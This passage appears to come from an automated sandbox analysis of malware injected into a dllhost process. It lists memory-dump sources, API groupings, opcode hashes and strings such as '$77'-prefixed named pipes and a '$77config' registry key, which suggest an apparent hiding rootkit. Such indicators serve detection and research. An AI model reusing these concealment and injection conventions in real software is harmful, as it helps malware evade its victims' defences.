• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Utilization Percentage
                                                                                                                                  • API String ID: 1943346504-3507739905
                                                                                                                                  • Opcode ID: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction ID: a4dd49ce4cbc28840add1cb7dc4899e3cfda13faac20740a1bce9bf1cd559cbf
                                                                                                                                  • Opcode Fuzzy Hash: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction Fuzzy Hash: FF317A26E18B498AEB10DF62A8C875AB3A6FFC5F84F444925DE8A43734DF38D456C700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4184240511-0
                                                                                                                                  • Opcode ID: b3251da8290bbac3b162c96b741c7c54804fb0e9f3ba261baabe9ec2fcce5d14
                                                                                                                                  • Instruction ID: 60e6dbc571274f66831ba4b946aa5f611256291b0e6fc880edfcfd2fe37b3460
                                                                                                                                  • Opcode Fuzzy Hash: b3251da8290bbac3b162c96b741c7c54804fb0e9f3ba261baabe9ec2fcce5d14
                                                                                                                                  • Instruction Fuzzy Hash: A54147B2700A859AE711CF6AE8843DD73B1FB89B89F445225BF0A47A69DF38C159C300
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction ID: 724aaa8d7341831bf1dfc85d0cd23e1324cd1f876679b3aa7097471a52462621
                                                                                                                                  • Opcode Fuzzy Hash: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction Fuzzy Hash: FFD1907A604B48CEEF60DF25D48839E77A2FB49788F180915EEC95BB96EB34C181C700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction ID: eaff9780fdd0ebd37a5d8776354dcddb21e6ed844a41ebd33b21c7ee74830345
                                                                                                                                  • Opcode Fuzzy Hash: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction Fuzzy Hash: E4D1AE36A08B888EEB20DF65D4883DD77A6FBC5788F145916EEC957B9ACB34C481C701
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction ID: c7f1ceff66ce641fd8b5b951e0469dc10373f6cb6cf158f1536627b03372fdce
                                                                                                                                  • Opcode Fuzzy Hash: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction Fuzzy Hash: 1C417173618B84CAE764CF61E48839E77B2F788B98F448529DA8947758DF3CC589CB40
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                  • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                                                                                                                  • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                  • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                                                                                  • String ID: \\.\pipe\$77childproc
                                                                                                                                  • API String ID: 166002920-421986751
                                                                                                                                  • Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction ID: 682b49e6e14f7fdb217c837473fc1ca81f87b88d09956671ad243240f5d1dae6
                                                                                                                                  • Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction Fuzzy Hash: F7119D32A29B4486F710CF21F49831AB770FB89BE4F504611EA9903BA8CF7CC148CB40
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction ID: a7fa7af371fd17fa73086cc8e644d49582d24c7134678540973913d4a789d242
                                                                                                                                  • Opcode Fuzzy Hash: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction Fuzzy Hash: 9481E469A0124DCEFA509B2598DD39BB2D7EF46780F548D25AAC94F3D6FB38C845D300
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction ID: 5954eaa256ddc6af3ca163f991b22697079b9af7d5074fd977cb417efdb3c58e
                                                                                                                                  • Opcode Fuzzy Hash: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction Fuzzy Hash: 1581E420F0C64DAEFB60AB6598CD3A977A3EFC57A0F544C15EAC84B792DB78C8458740
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD098F1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD098FF
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD09929
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD09997
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000290EDD09A2B,?,?,?,00000290EDD0921C,?,?,?,?,00000290EDD08D25), ref: 00000290EDD099A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Delete$CloseEnumOpen
• String ID: SOFTWARE\$77config
• API String ID: 3013565938-1431229562
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: $77
• API String ID: 756756679-3904844309
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: ErrorLast$Value$FreeHeap
• String ID:
• API String ID: 365477584-0
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
• String ID:
• API String ID: 4193868204-0
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
                                                                                                                                  • Opcode ID: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction ID: 65c2bdc854f18125b3be31e2ef706afdde203de50b560e908ed50615ee4e333c
                                                                                                                                  • Opcode Fuzzy Hash: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction Fuzzy Hash: C5F0686270868996E720CF25F9D87597371FB85B88F844420DAC987594DF7CC69CC700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CombinePath
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3422762182-91387939
                                                                                                                                  • Opcode ID: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction ID: 16b84009459c99c84a585b4f23ed7aa823fa11f005a1afe77e13825b4b4ca1a2
                                                                                                                                  • Opcode Fuzzy Hash: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction Fuzzy Hash: C1F08260B19B8886EA408B13B99C219B221EF89FC0F489830EE8607B28DE2CC4418300
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction ID: 7c000c98f03e61e3344d8810428f79650fba638244d031ec4d25807f321fa2ef
                                                                                                                                  • Opcode Fuzzy Hash: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction Fuzzy Hash: 92F09061B0A70989EB108B24A8D83693331EFC9760F540F19DAE9466E4CF2CC448C300
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 3aea7139df32369f879ece52c3062891ec0d21dfbcfe470f159ab8e5a177004e
                                                                                                                                  • Instruction ID: 67ff97698d59bfeef0940e0b4f1a1cd640a6af7f2715dac83582c025870b86a1
                                                                                                                                  • Opcode Fuzzy Hash: 3aea7139df32369f879ece52c3062891ec0d21dfbcfe470f159ab8e5a177004e
                                                                                                                                  • Instruction Fuzzy Hash: 3A02C836A1DB888AEBA0CB55F49875AB7A1F7C4794F100515EACE87BA8DF7CD444CB00
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 0441838d824fc983c730246148d7a7fc38d6cc047019034bf9020db6d46abb4c
                                                                                                                                  • Instruction ID: 3128cabcfc80a8f8c0f9db07564f79d7678210d8e2538fb3322b9756668ddc60
